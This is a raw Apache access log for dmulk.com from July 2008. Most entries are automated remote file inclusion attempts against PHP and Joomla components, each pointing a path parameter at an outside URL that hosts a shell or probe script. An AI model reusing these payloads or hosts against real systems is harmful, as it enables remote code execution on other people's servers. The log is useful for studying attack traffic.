85.17.207.244 - - [24/Jul/2008:07:24:44 -0700] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.231.6 - - [24/Jul/2008:07:25:07 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 14329 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
201.238.195.13 - - [24/Jul/2008:07:25:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:07:25:33 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:07:25:33 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:07:25:34 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:25:36 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:25:36 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:25:36 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0028.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:25:50 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:25:51 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:25:51 -0700] "GET /blog/?nggpage=2&pageid=17&show=gallery HTTP/1.1" 200 54419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:26:09 -0700] "GET /logs/access_080313.log%20/?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.230.197.245 - - [24/Jul/2008:07:26:26 -0700] "GET /logs/access.log/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/Jul/2008:07:26:27 -0700] "GET /index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/Jul/2008:07:26:27 -0700] "GET /logs/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:27:08 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:27:08 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:28:31 -0700] "GET /logs/access_080313.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:28:31 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:28:31 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:28:40 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:28:40 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.0.228.184 - - [24/Jul/2008:07:28:43 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:28:48 -0700] "GET /logs/access_080303.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:28:49 -0700] "GET /logs/access_080204.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:28:57 -0700] "GET /logs/access_080128.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:29:47 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:29:47 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:29:57 -0700] "GET /logs/access_071230.log/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:07:29:57 -0700] "GET /logs/access.log/errors.php?error=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:07:29:57 -0700] "GET /logs/errors.php?error=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:29:58 -0700] "GET /logs/access_071230.log/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:29:58 -0700] "GET /logs/access_071230.log/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [24/Jul/2008:07:30:09 -0700] "GET /logs/access_080128.log//convert/mvcw.php?step=1&vwar_root=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.150.164.25 - - [24/Jul/2008:07:30:46 -0700] "GET /logs/access_080313.log%20/?sourcedir=http://prunette.com/editor/cmdd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.150.164.25 - - [24/Jul/2008:07:30:46 -0700] "GET /logs/?sourcedir=http://prunette.com/editor/cmdd.txt?? HTTP/1.1" 200 57423 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.88 - - [24/Jul/2008:07:30:53 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 6894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.150.164.25 - - [24/Jul/2008:07:30:53 -0700] "GET /?sourcedir=http://prunette.com/editor/cmdd.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:31:22 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:31:22 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:31:26 -0700] "GET /logs/access_080125.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:32:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:32:02 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:32:04 -0700] "GET //index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 200 18479 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:32:07 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:07:32:07 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.207.2.62 - - [24/Jul/2008:07:32:23 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.207.2.62 - - [24/Jul/2008:07:32:23 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.207.2.62 - - [24/Jul/2008:07:32:24 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:32:54 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:32:54 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:33:43 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:33:43 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:07:33:46 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:07:33:46 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:33:54 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:33:59 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:34:20 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:34:21 -0700] "GET //common/db.php?commonpath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:34:22 -0700] "GET /logs//common/db.php?commonpath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.88 - - [24/Jul/2008:07:34:24 -0700] "GET /blog/wp-content/uploads/?D=A HTTP/1.0" 200 3057 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:34:25 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:34:25 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:07:34:44 -0700] "GET /logs/access.log/errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:07:34:45 -0700] "GET /errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:07:34:45 -0700] "GET /logs/errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:34:52 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:34:52 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:34:53 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:07:35:40 -0700] "GET /errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:35:51 -0700] "GET /logs/access.log%20//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:54 -0700] "GET /logs/access.log//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:54 -0700] "GET /logs/access.log//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:57 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:57 -0700] "GET //index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:57 -0700] "GET //index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:58 -0700] "GET //index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:58 -0700] "GET /logs//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:35:58 -0700] "GET /logs//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:36:00 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:36:00 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:36:03 -0700] "GET //index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:36:05 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:36:12 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:36:12 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:36:40 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery HTTP/1.1" 200 53420 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
89.108.66.136 - - [24/Jul/2008:07:37:17 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://sibtorg.com/shop/usr/extensions/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.136 - - [24/Jul/2008:07:37:17 -0700] "GET /logs//components/errors.php?error=http://sibtorg.com/shop/usr/extensions/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:37:40 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:37:44 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 18489 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:37:45 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:37:45 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:37:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:37:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:37:53 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 18489 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:37:57 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:38:31 -0700] "GET /logs/access.log//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:38:33 -0700] "GET //index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:38:37 -0700] "GET /logs//index1.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:38:53 -0700] "GET /logs/access_080218.log%20/?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:38:56 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:38:56 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:38:56 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.108.66.136 - - [24/Jul/2008:07:38:58 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://sibtorg.com/shop/usr/extensions/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:38:58 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 18489 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:39:02 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:39:18 -0700] "GET /errors.php?error=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:07:39:21 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:39:41 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:39:43 -0700] "GET //index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.207.137 - - [24/Jul/2008:07:39:46 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:39:51 -0700] "GET /logs/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
